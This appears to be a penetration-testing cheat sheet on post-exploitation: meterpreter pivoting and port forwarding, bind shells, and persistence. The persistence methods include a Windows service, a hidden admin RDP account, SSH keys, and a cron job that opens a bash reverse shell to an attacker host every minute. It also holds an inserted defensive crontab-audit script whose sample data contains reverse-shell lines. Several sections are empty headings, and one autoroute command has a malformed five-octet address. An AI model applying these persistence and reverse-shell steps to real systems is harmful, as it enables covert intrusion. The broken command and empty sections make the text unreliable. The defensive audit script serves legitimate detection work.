Post-Exploitation & Commands
Useful Commands
Linux
Enumeration
Windows
Bind Shell
A bind shell is the less preferred option: the attacker connects directly to the target system, and in most environments ingress traffic to an unexpected port is blocked or flagged as suspicious.
Transfer files
[Fully] interactive shell
Interactive shell
Fully interactive shell
Pivoting & Port forwarding
Metasploit (in meterpreter)
ipconfig
Find the target's subnets (the host may be in another network).
run autoroute -s <subnet>
Add a route for the subnet of the internal network. From then on, any time we want to contact a machine within one of the specified networks, we go through the meterpreter session and use it to connect to the targets.
Example:
ipconfig
IP 19.9.29.148. Netmask: 255.255.240.0
run autoroute -s 10.10.0.29.0/20
run autoroute -p
Displays the active routing table.
auxiliary/scanner/portscan/tcp : performs the port scan. NOTE: scanning with Metasploit is limited (it can't discover software versions etc.), so it's better to use nmap. To do that we need to perform port forwarding.
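The autoroute argument is the network address derived from the interface's IP and netmask shown by ipconfig. The script below is an added example (not code from the page or from Metasploit) that parses a constructed sample of meterpreter `ipconfig` output, computes the CIDR subnet for each non-loopback interface with Python's `ipaddress` module, and prints the corresponding `run autoroute -s` lines. The sample output, its interface names and MAC addresses are constructed for the example; the IP and netmask are the ones from the text above.

```python
import ipaddress
import re

# Constructed sample of meterpreter `ipconfig` output (not captured from a real session).
SAMPLE_IPCONFIG = """\
Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface  2
============
Name         : eth0
Hardware MAC : 00:11:22:33:44:55
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 19.9.29.148
IPv4 Netmask : 255.255.240.0
"""

# Matches the "IPv4 Address : x" and "IPv4 Netmask : y" lines, one per interface.
FIELD_RE = re.compile(r"^(IPv4 Address|IPv4 Netmask)\s*:\s*(\S+)", re.M)


def parse_interfaces(text):
    """Return a list of (address, netmask) pairs found in ipconfig output."""
    pairs = []
    addr = None
    for key, value in FIELD_RE.findall(text):
        if key == "IPv4 Address":
            addr = value
        elif key == "IPv4 Netmask" and addr is not None:
            pairs.append((addr, value))
            addr = None
    return pairs


def subnet_for(address, netmask):
    """Network in CIDR form: ('19.9.29.148', '255.255.240.0') -> '19.9.16.0/20'."""
    iface = ipaddress.ip_interface(f"{address}/{netmask}")
    return str(iface.network)


def autoroute_commands(text):
    """Build the `run autoroute -s <subnet>` lines, skipping the loopback interface."""
    cmds = []
    for addr, mask in parse_interfaces(text):
        net = ipaddress.ip_network(subnet_for(addr, mask))
        if net.is_loopback:
            continue
        cmds.append(f"run autoroute -s {net}")
    return cmds


if __name__ == "__main__":
    for cmd in autoroute_commands(SAMPLE_IPCONFIG):
        print(cmd)
```

Running it on the sample yields `run autoroute -s 19.9.16.0/20`: a /20 mask keeps only the top four bits of the third octet (29 = 0001 1101, giving 16), which is the value to pass to autoroute for that interface.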
Since target_sys_2 has no route back to attacker_sys, use a bind shell payload: windows/meterpreter/bind_tcp
Port forwarding (meterpreter/metasploit)
portfwd add -l 1234 -p 80 -r <target_sys_2_ip>
Forwards a remote port to a local port. In this case we want to scan port 80 of target 2.
portfwd list
Lists the active port forwards.
nmap -sV -sC -p 1234 localhost
Persistence
Windows
Metasploit
search persistence module (Windows)
Ex: exploit/windows/local/persistence_service
It generates and uploads an executable to the remote host, then installs it as a persistent service: a new service is created that starts the payload whenever the service runs. Admin or SYSTEM privileges are required.
To connect again later, set up a listener to receive the connection.
Enable RDP
With Metasploit: search enable_rdp (and set the session)
Connect to victim from attacker
Note: you need a username and password; if you don't have the password, change it:
net user <username> <new_pass>
(suspicious in a real environment) or crack the NTLM hash.
Note 2: you can also create a new account and add it to the Administrators group.
Second way, with Metasploit/meterpreter (creates the account and settings automatically):
In meterpreter
run getgui -e -u user_you_want -p password_you_want
Enables the RDP service -> creates a new user with the provided parameters -> hides the user from the Windows login screen -> adds the user to the Remote Desktop Users and Administrators groups.
Linux
Metasploit
search persistence module (Linux)
Example: post/linux/manage/sshkey_persistence (requires elevated privileges; this module adds an SSH key to a specified user)
Via SSH key
After gaining access to a Linux system, you can transfer the SSH private key to your local machine and use it to connect via SSH.
With cron jobs
Set up a listener.
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron
Creates a cron job entry (every-minute time format).
crontab -i cron
crontab -l
Shows the crontab of the current user.
NOTE: if the command doesn't work, try another reverse shell.
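From the defender's side, the every-minute `/dev/tcp` entry above is exactly what a crontab audit should catch. The script below is an added example (not code from the page) that parses the output of `crontab -l` and flags entries carrying reverse-shell indicators (a `/dev/tcp` or `/dev/udp` path, `bash -i`, `nc -e`, stdio redirections), noting an every-minute schedule as an aggravating factor. The crontab text is constructed for the example and uses the TEST-NET address 203.0.113.10; the indicator names are my own labels.

```python
import re

# Constructed sample crontab (not captured from a real host); 203.0.113.10 is a TEST-NET address.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/15 * * * * /usr/bin/php /var/www/cron.php
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'
@reboot /usr/bin/nc -e /bin/sh 203.0.113.10 4444
"""

# Indicators of a reverse shell planted in cron (labels are assumptions for this example).
INDICATORS = {
    "dev_tcp": re.compile(r"/dev/(tcp|udp)/"),
    "interactive_bash": re.compile(r"\bbash\s+-i\b"),
    "nc_exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s"),
    "stdio_redirect": re.compile(r">&\s*/dev/|0>&1"),
}

# Either a @reboot/@daily style keyword or five schedule fields, then the command.
CRON_LINE = re.compile(r"^(@\w+|(?:\S+\s+){5})(.*)$")


def parse_crontab(text):
    """Return (schedule, command) pairs for each non-comment crontab line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m:
            entries.append((m.group(1).strip(), m.group(2).strip()))
    return entries


def audit_crontab(text):
    """Return findings as (schedule, command, [indicator names]) for suspicious entries."""
    findings = []
    for schedule, command in parse_crontab(text):
        hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
        # An every-minute schedule on its own is not suspicious, but it is
        # typical of a callback that must reconnect quickly after being killed.
        if hits and schedule == "* * * * *":
            hits.append("every_minute")
        if hits:
            findings.append((schedule, command, hits))
    return findings


if __name__ == "__main__":
    for schedule, command, hits in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(hits)}] {schedule} {command}")
```

Run it against `crontab -l` output for each user (and the system crontabs under /etc/cron.d) as part of a persistence sweep; the backup and PHP entries in the sample produce no finding, while the two callback entries do.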
Clearing tracks
Windows
Linux
Keylogger